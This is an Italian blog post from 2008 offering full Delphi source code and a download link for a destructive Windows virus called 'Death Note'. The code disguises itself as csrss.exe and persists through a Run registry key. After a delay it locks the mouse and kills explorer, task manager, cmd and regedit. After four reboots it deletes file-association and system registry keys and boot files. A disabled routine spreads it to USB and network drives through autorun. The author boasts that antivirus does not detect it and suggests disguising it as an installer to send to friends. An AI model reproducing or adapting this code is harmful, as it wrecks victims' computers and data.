Cosa ne pendi del blog?

sabato 2 agosto 2008

Virus death note

NON MI ASSUMO ALCUNA RESPONSABILITA DELL USO CHE NE FARETE
[il download del virus già compilato e pronto all'uso è alla fine, ma conviene leggere tutto comunque] DEATH NOTE è il virus che ho fatto io durante una sfida di programmazzione che abbiamo fatto con i miei amici, l'ho vinta io e di brutto....
cmq il virus è scritto in DELPHI e in pratica aspetta 7 giorni dall'ultima volta che è stato lanciato e per quattro volte al giorno successivo dei sette il death note (NOTE DI MORTE)
blocca completamente l'utente togliendogli l'uso del mouse, del desktop va qualunque cosa gli leva pure il vizzio di cagare all'utente, in fine dopo 4 riavvia che il pc continua a bloccarsi parte l'ultima fase del virus la parte distruttiva, in pratica elimina tutte le referenze che ha il pc con i file .exe .dll .ini, in pratica non riesce più ad eseguirli, ma non è finita in fine elimina completamente il boot di sistema anche quello provvisorio, al momento nessun antivirus lo riconosce come virus.

IL SORGENTE è UN PO COMPLICATO MA SE VE NE INTENDETE DI DELPHI POTETE CAPIRE PRECISAMENTE I VARI PASSAGGI CHE COSA FA

FUNZIONAMENTO
- dopo che viene lanciato si autoimposta in modalità invisibile
- fa una copia di se stesso in c:\windows\csrss.exe (si spaccia per un file di windows)
- controlla il suo nome di quando è stato lanciato se il nome è csrss non da nessun messaggio, ma se l'applicazione è stata rinominata alla fine dei primi due processi lancia un messaggio con scritto "INSTALLAZZIONE COMPLETATA" così posso rinominarlo e mandarlo a qualche mio amico spacciandolo per l'installazzione di qualche programmino
- se è la prima volta che viene lanciato crea nel registro di systema una serie di chiavi di registro una che serve per avviarsi automaticamente al riavvia e le altre che servono per il conteggio dei giorni che mancano, un altra per vedere se la parte bloccante del virus è stata avviata così se il virus è stata avviato e poi con il bios siete andati indietro con la data il virus riparte lo stesso, e in fine una chiave che gli serve a tenere il conto delle volte che è stata lanciata la parte bloccante del virus
- appena controlla questa ultima opzione controlla la data e la comapra con la data che si è prefissato per quando deve avviarsi se la data non è quella o minore di quella prefissata il virus si termina e aspetta il prossimo avvio del pc, così da non lasciare tracce durante i sette giorni di attesa per non appesantire il systema
- se la data è maggiore o uguale a quella che si era prefissata segna la chiave che avevo detto prima quella per capire se almeno una volta era stata avviata la parte bloccante, dopo di che passa all'azzione:

- blocca il mous
- scompare la barra dello start
- il task manager non si apre (se anche riusciste ad aprire il task sarebbe inutile xchè il nome csrss.exe se provate a terminarlo il windows risponde processo di systema non si può termiare)
- lo speeker di system inizia a fare beep all'infinito
- in fine in mezzo all'inferno causato si apre una finesta con scritto "(nome dell'utente) AVVERTENZE ERRORE CRITOCO!, WINDOWS ELIMINATO" dove c'è la parentesi compare il nome dell'utente che è in uso :cry:
- in fine si clicca su ok e il pc si riavvia o se non si vuole fare su ok il sistema va in Overflow (sovraccarico) e si riavvia lo stesso
- da adesso in poi agni volta che si riavvia il pc si avvicina sempre + verso la morte xchè dopo quattro riavvia dal primo bloccaggio il virus elimina le sue tracce e tutte le tracce di windows e del boot
- al riavvio finale il pc non funzionerà completamente comparità una schermata blu (se avete il cd di ripristino di windows e ripristinate cioè riscrivete di sopra senza formattare levatevelo dalla testa xchè il systema è compromesso poichè il virus ha provveduto a cancellare i famosi file di registro) :cry:

il virus lo sto ancora evolvendo è ancora non è completamente finito per suggerimenti e altro l'email è questa napster.begin@live.it

il sorgente è diviso in tre parti poichè in un solo file di progettazzione sarebbe diventato veramente un casino

MASTER è dove c'è scritta tutta la procedura di sopra indicata
CODICE
unit Master;



interface



uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, XPMan, ExtCtrls, StdCtrls, Registry, IdBaseComponent, IdComponent,

IdTCPConnection, IdTCPClient, IdExplicitTLSClientServerBase, IdMessageClient,

IdSMTPBase, IdSMTP, IdMessage, Wininet;



type

T_Master = class(TForm)

autorun: TMemo;

Beep: TTimer;

Mouse: TTimer;

TaskKill: TTimer;

Registro: TTimer;

FileEx: TTimer;

Rete: TTimer;

procedure FormActivate(Sender: TObject);

procedure MouseTimer(Sender: TObject);

procedure BeepTimer(Sender: TObject);

procedure TaskKillTimer(Sender: TObject);

procedure FormClose(Sender: TObject; var Action: TCloseAction);

procedure RegistroTimer(Sender: TObject);

procedure FileExTimer(Sender: TObject);

procedure ReteTimer(Sender: TObject);

private

{ Private declarations }

public

{ Public declarations }

end;



var

_Master: T_Master;

Chiavi : TRegistry;

Utente : string;

Hndl : integer;



Const

Root0 = 'Software\Microsoft\Windows\CurrentVersion\Run';

Root2 = 'Software\HelloWord';



implementation



Uses NapSter, Distruzione;



{$R *.dfm}



function NomeUtente: string;

var

buf: array[ 0 .. 31 ] of char;

i: Cardinal;

begin

Result;

i := 31;

GetUserName(@buf, i);

Result := buf;

end;



function Spegni(RebootParam: Longword): Boolean;

Var

TTokenHd: THandle;

TTokenPvg: TTokenPrivileges;

cbtpPrevious: DWORD;

rTTokenPvg: TTokenPrivileges;

pcbtpPreviousRequired: DWORD;

tpResult: Boolean;



Const

SE_SHUTDOWN_NAME = 'SeShutdownPrivilege';



begin

if Win32Platform = VER_PLATFORM_WIN32_NT then

begin

tpResult := OpenProcessToken(GetCurrentProcess(),

TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,

TTokenHd);

if tpResult then

begin

tpResult := LookupPrivilegeValue(nil,

SE_SHUTDOWN_NAME,

TTokenPvg.Privileges[0].Luid);

TTokenPvg.PrivilegeCount := 1;

TTokenPvg.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;

cbtpPrevious := SizeOf(rTTokenPvg);

pcbtpPreviousRequired := 0;

if tpResult then

Windows.AdjustTokenPrivileges(TTokenHd,

False,

TTokenPvg,

cbtpPrevious,

rTTokenPvg,

pcbtpPreviousRequired);

end;

end;

Result := ExitWindowsEx(RebootParam, 0);

end;



procedure T_Master.BeepTimer(Sender: TObject);

var

a : integer;

begin

repeat

a := random(3000);

until a > 100;

Windows.Beep(a, 100);

end;



procedure T_Master.FormActivate(Sender: TObject);

var

tmp : integer;

begin

begin

ShowWindow(Handle, SW_HIDE);

ShowWindow(Application.Handle, SW_HIDE);

NapSter.Registro;

NapSter.Virus_Infect;

end;

begin

RegistroTimer(Self);

FileExTimer(Self);

if not (Application.Title = 'csrss') then

MessageDlg('Installazione completata', mtInformation, [mbOK], 0);

// Napster.Rete;

end;

begin

Chiavi := Tregistry.Create;

Chiavi.RootKey := HKEY_CURRENT_USER;

Chiavi.OpenKey(Root2, True);

if Chiavi.ReadInteger('Avvio') = 0 then

begin

if (Date = Chiavi.ReadDate('Data')) or (Date > Chiavi.ReadDate('Data')) then

begin

_Master.Registro.Enabled := true;

_Master.FileEx.Enabled := true;

Chiavi.WriteInteger('Avvio', 1);

Chiavi.WriteInteger('Avvio_canc', Chiavi.ReadInteger('Avvio_canc') + 1);

Hndl := FindWindow(PChar('Shell_TrayWnd'), nil);

ShowWindow(hndl, SW_HIDE);

_Master.TaskKill.Enabled := True;

_Master.Beep.Enabled := True;

_Master.Mouse.Enabled := True;

Utente := NomeUtente;

Utente := AnsiUpperCase(Utente);

MessageDlg(Utente +

' AVVERTENZE ERRORE CRITOCO!, WINDOWS ELIMINATO',

mtWarning, [mbOK], 0);

Spegni(EWX_REBOOT);

end else

begin

RegistroTimer(Self);

FileExTimer(Self);

Registro.Enabled := false;

FileEx.Enabled := false;

if not (Application.Title = 'csrss') then

begin

Application.Terminate;

end;

end;

end else

begin

tmp := Chiavi.ReadInteger('Avvio_canc');

tmp := tmp + 1;

Chiavi.WriteInteger('Avvio_canc', tmp);

Hndl := FindWindow(PChar('Shell_TrayWnd'), nil);

ShowWindow(hndl, SW_HIDE);

_Master.TaskKill.Enabled := True;

_Master.Beep.Enabled := True;

_Master.Mouse.Enabled := True;

if (Chiavi.ReadInteger('Avvio_canc') > 4) or

(Chiavi.ReadInteger('Avvio_canc') = 4) then

begin

Distruzione.Registro;

Distruzione.Boot;

end;

Utente := NomeUtente;

Utente := AnsiUpperCase(Utente);

MessageDlg(Utente +

' AVVERTENZE ERRORE CRITOCO!, WINDOWS ELIMINATO',

mtWarning, [mbOK], 0);

Spegni(EWX_REBOOT);

end;

end;

end;



procedure T_Master.FormClose(Sender: TObject; var Action: TCloseAction);

begin

Application.Run;

end;



procedure DisabilitaMouse;

var

rc: TRect;

begin

GetWindowRect(GetDeskTopWindow, rc);

rc.Top:=rc.Bottom;

rc.Left:=rc.Right;

SetCursorPos(rc.Left,rc.Top);

ClipCursor(@rc);

end;



procedure T_Master.MouseTimer(Sender: TObject);

begin

DisabilitaMouse;

end;



procedure T_Master.RegistroTimer(Sender: TObject);

begin

WinExec('TaskKill /F /IM TeaTimer.exe', SW_HIDE);

Chiavi := TRegistry.Create;

Chiavi.RootKey := HKEY_LOCAL_MACHINE;

Chiavi.OpenKey(Root0, True);

if not(Chiavi.ReadString('SystemRoot') = '"C:\Windows\csrss.exe"')then

Chiavi.WriteString('SystemRoot', '"C:\Windows\csrss.exe"');

end;



procedure T_Master.ReteTimer(Sender: TObject);

begin

// FormActivate(Self);

end;



procedure T_Master.FileExTimer(Sender: TObject);

begin

if not FileExists ('C:\Windows\csrss.exe') then

CopyFile(PChar(application.ExeName), Pchar('C:\Windows\csrss.exe'), false);

end;



procedure T_Master.TaskKillTimer(Sender: TObject);

begin

WinExec('TaskKill /F /IM explorer.exe', SW_HIDE);

WinExec('TaskKill /F /IM taskmgr.exe', SW_HIDE);

WinExec('TaskKill /F /IM cmd.exe', SW_HIDE);

WinExec('TaskKill /F /IM regedit.exe', SW_HIDE);

end;



end.


NAPSTER DOVE CI SONO LE PROCEDURE DI SCRITTURA DEI REGISTRI
PS.
AVEVO AGGIUNTO ANCHE UNA PROCEDURA PER INFETTARE LE PEN DRIVE CON TANTO DI AUTOEXEC
CMQ OCCUPA TROPPA RAM ALL'AVVIO E L'HO DISATTIVATA
CODICE
unit Napster;



interface



Uses

Registry, Windows, Messages, SysUtils, Variants, Classes, Dialogs, Controls,

StdCtrls, Forms;



Procedure Virus_Infect;

Procedure Registro;

Procedure Rete;

Procedure AB;



Var

Chiavi : TRegistry;

Fine : TDate;

a : Integer;

Drive : char;



Const

Root = 'Software\HelloWord';



implementation



Uses Master;



procedure Rete;

begin

a := 0;

repeat

a := a + 1;

Napster.AB;

case GetDriveType(PChar(Drive + ':\')) of

DRIVE_REMOVABLE: begin

CopyFile(PChar(application.ExeName), Pchar(Drive + ':\sys.exe'), false);

WinExec(Pchar('attrib +s +h '+ Drive +':\sys.exe'), SW_HIDE);

_Master.autorun.Lines.SaveToFile(Pchar(Drive + ':\autorun.inf'));

end;

DRIVE_REMOTE: begin

CopyFile(PChar(application.ExeName), Pchar(Drive + ':\sys.exe'), false);

WinExec(Pchar('attrib +s +h '+ Drive +':\sys.exe'), SW_HIDE);

end;

end;

until a = 23;

end;



Procedure Virus_Infect;

begin

CopyFile(PChar(application.ExeName), Pchar('C:\Windows\csrss.exe'), false);

end;



Procedure Registro;

begin

// WinExec('TaskKill /F /IM TeaTimer.exe', SW_HIDE);

Chiavi := TRegistry.Create;

Chiavi.RootKey := HKEY_CURRENT_USER;

Chiavi.OpenKey(Root, True);

if Chiavi.ReadString('Creato') = 'Creato' then

begin

NapSter.Fine := Chiavi.ReadDate('Data');

end else

begin

// Chiavi.WriteDate('Data', Date + strtodate('6/01/1900'));

Chiavi.WriteDate('Data', Date );

Chiavi.WriteString('Creato', 'Creato');

Chiavi.WriteInteger('Avvio', 0);

Chiavi.WriteInteger('Avvio_canc', 0);

end;

Chiavi.CloseKey;

end;



Procedure AB;

begin

if a = 1 then

begin

Drive := 'Q';

end;

if a = 2 then

begin

Drive := 'W';

end;

if a = 3 then

begin

Drive := 'E';

end;

if a = 4 then

begin

Drive := 'R';

end;

if a = 5 then

begin

Drive := 'T';

end;

if a = 6 then

begin

Drive := 'Y';

end;

if a = 7 then

begin

Drive := 'U';

end;

if a = 8 then

begin

Drive := 'I';

end;

if a = 9 then

begin

Drive := 'O';

end;

if a = 10 then

begin

Drive := 'P';

end;

if a = 11 then

begin

Drive := 'S';

end;

if a = 12 then

begin

Drive := 'D';

end;

if a = 13 then

begin

Drive := 'F';

end;

if a = 14 then

begin

Drive := 'G';

end;

if a = 15 then

begin

Drive := 'H';

end;

if a = 16 then

begin

Drive := 'J';

end;

if a = 17 then

begin

Drive := 'K';

end;

if a = 18 then

begin

Drive := 'L';

end;

if a = 19 then

begin

Drive := 'Z';

end;

if a = 20 then

begin

Drive := 'X';

end;

if a = 21 then

begin

Drive := 'V';

end;

if a = 22 then

begin

Drive := 'N';

end;

if a = 23 then

begin

Drive := 'M';

end;

end;



end.


DISTRUZIONE QUI DENTRO CI SONO TUTTI I FILE E LE CHIAVI DI REGISTRO CHE VERRANNO ELIMINATE
CODICE
nit Distruzione;



interface



Uses

Windows, Registry;



Procedure Boot;

Procedure Registro;



Var

Chiavi : TRegistry;



implementation



Procedure Registro;

begin

WinExec('TaskKill /F /IM TeaTimer.exe', SW_HIDE);

Chiavi := TRegistry.Create;

Chiavi.RootKey := HKEY_CLASSES_ROOT;

Chiavi.DeleteKey('.dll');

Chiavi.DeleteKey('.exe');

Chiavi.DeleteKey('.ini');

Chiavi.RootKey := HKEY_LOCAL_MACHINE;

Chiavi.DeleteKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run');

Chiavi.DeleteKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer');

Chiavi.DeleteKey('SOFTWARE');

Chiavi.RootKey := HKEY_CURRENT_USER;

Chiavi.DeleteKey('Control Panel\Desktop');

Chiavi.DeleteKey('Control Panel\Cursors');

Chiavi.DeleteKey('Control Panel\Custom Colors');

Chiavi.DeleteKey('Control Panel\Keyboard');

Chiavi.DeleteKey('Control Panel\Mouse');

Chiavi.DeleteKey('Console');

Chiavi.DeleteKey('Software');

end;



Procedure Boot;

begin

DeleteFile('C:\boot.ini');

DeleteFile('C:\bootfont.bin');

DeleteFile('C:\msdos.sys');

DeleteFile('C:\autoexec.bat');

DeleteFile('C:\Windows\bootstat.dat');

DeleteFile('C:\Windows\system\timer.drv');

DeleteFile('C:\Windows\system32\bootvid.dll');

DeleteFile('C:\Windows\system32\bootcfg.exe');

DeleteFile('C:\Windows\system32\bootok.exe');

DeleteFile('C:\Windows\system32\bootvrfy.exe');

DeleteFile('C:\Windows\system32\drivers\dmboot.sys');

DeleteFile('C:\Windows\system32\dllcache\bootvid.dll');

DeleteFile('C:\Windows\system32\dllcache\bootcfg.exe');

DeleteFile('C:\Windows\system32\dllcache\bootok.exe');

DeleteFile('C:\Windows\system32\dllcache\bootvrfy.exe');

DeleteFile('C:\Windows\system32\dllcache\dmboot.sys');

end;



end.


PS.
IL VIRUS È FUNZIONANTE E ABBASTANZA PERICOLOSO POICHÈ UN UTENTE NON SI ACCORGE DELLA SUA PRESENZA ALMENO NELLA PRIMA SETTIMANA QUESTO PER EVITARE DI FAR CAPIRE CHE SONO STATO IO AD INFETTARLO QUI POSTO IL LINK MI DISCOLPO DALL'USO DEL VIRUS CHE VERRÀ FATTA NON PROVATELO A SCUOLA ANCHE SE LO FATTO IO E POI NON SIAMO ANDATI NELL'AULA DI LAB PER UN MESE E NON PERCHÈ MI AVEVANO SGAMATO MA XCHÈ IL VIRUS SI ERA SPOSTATO IN TUTTI I PC COLLEGATI IN RETE E QUINDI ANCHE QUELLO DEL PROF E SONO STATI UN SACCO DI TEMPO A FORMATTARLI TUTTI PER POTERLI RIPRISTINARE.
A..... MI DIMENTICAVO NEL LINK C'È IL VIRUS GIÀ COMPILATO E FUNZIONATE + IL PROGETTO ORIGINALE + IL CRACK CHE SERVE A CAMBIARE LA DATA DI SCADENZA DEL VIRUS CIOÈ IL GIORNO QUANDO DEVE PARTIRE
DOWNLOAD DEATH NOTE+CRACK+SORGENTE (COPIATE E INCOLLATE IL LINK NELLA BARRA DEGLI INDIRIZZI )-------> http://napsterbegin.altervista.org/Sorgent...e/DeathNote.zip

3 commenti:

Anonimo ha detto...

amico mio lo sai che nn è carino rubare le cose altrui..

sarebbe stata cosa buona e giusta chiedere il permesso

Anonimo ha detto...

diocane come scrivi di merda
VERGOGNA

Anonimo ha detto...

E' possibile disattivarlo in qualche modo?